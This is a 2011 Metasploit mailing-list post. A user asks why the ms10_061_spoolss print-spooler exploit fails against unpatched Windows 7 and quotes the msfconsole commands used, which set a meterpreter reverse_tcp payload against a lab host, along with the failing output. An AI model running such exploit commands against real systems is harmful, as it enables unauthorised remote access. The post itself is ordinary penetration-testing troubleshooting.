Metasploit mailing list archives

msf exploit ms10_061_spoolss (Windows 7 target)


From: <adi () rohrer info>
Date: Thu, 6 Oct 2011 17:25:21 +0200

Hi,
I have a problem with the msf exploit ms10_061_spoolss. With Windows XP
targets it works stable, but with Windows 7 (without SP1 and other patches)
targets not. The description says windows 7 is supported.
Backtrack, msf and svn are updated.

This is what I do:
use exploit/windows/smb/ms10_061_spoolss
set PAYLOAD windows/meterpreter/reverse_tcp
set lhost 192.168.140.168
set rhost 192.168.140.169
exploit

Started reverse handler on 192.168.1.6:4444
[*] Trying target Windows Universal...
[*] Binding to
12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.1.9[\spoolss] ...
[*] Bound to
12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.1.9[\spoolss] ...
[-] Exploit exception: The server responded with error: STATUS_NOT_SUPPORTED
(Command=37 WordCount=0)
[*] Exploit completed, but no session was created.

Has anybody an idea?

Adi

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: